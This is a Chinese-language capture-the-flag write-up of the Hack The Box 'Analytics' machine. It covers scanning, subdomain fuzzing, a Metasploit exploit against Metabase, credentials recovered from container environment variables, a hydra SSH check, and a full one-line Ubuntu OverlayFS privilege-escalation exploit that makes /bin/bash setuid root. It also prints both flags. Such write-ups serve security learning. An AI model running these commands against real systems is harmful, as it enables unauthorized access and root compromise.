首先扫描靶机
nmap -sC -sV -T4 -Pn 10.10.11.233
得到一个http://analytical.htb/的域名,写进去hosts,然后访问一下
是一个信息数据的网站,右上角有个login,点进去会重定向另一个网址
也可以通过fuzz出来这个子域名,这次我使用的是wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://analytical.htb/' -H 'Host: FUZZ.analytical.htb' --hl 7
写进去后,打开可以看到是一个Metabase网址
在网上可以搜到该Metabase的漏洞特点以及利用,Metasploit已经更新出
直接使用msfconsole搜这个漏洞,这次我使用armitage,cobalt strike的卵生兄妹
设置好参数,一把梭哈
变成了红色闪电,说明已经getshell了,输入hostname,可以看到是不对应靶场名字的,说明我们在docker容器里面,输入env命令查看环境参数,里面写了ssh用户跟密码
这次我用hydra验证一下ssh登录,其实就是重温一下工具
hydra -l metalytics -p An4lytics_ds20223# -vV -f ssh://10.10.11.233
看来是对的,用户是metalytics,密码是An4lytics_ds20223#,直接armitage登录ssh
成功拿到user flag:47e231e0d741fc4a9b9673e26c27855a
输入sudo -l跟find命令都没找到提权路径,看看内核
可以看到,有个内核版本的漏洞,可以参考这篇文章
Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)
byu/sk1nT7 inselfhosted
输入这串命令,给/bin/bash权限,直接提权
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod u+s /bin/bash")'
成功拿到root flag:f8594e260bde3d9333537ead9067c430
原文始发于微信公众号(Jiyou too beautiful):HTB-Analytics笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论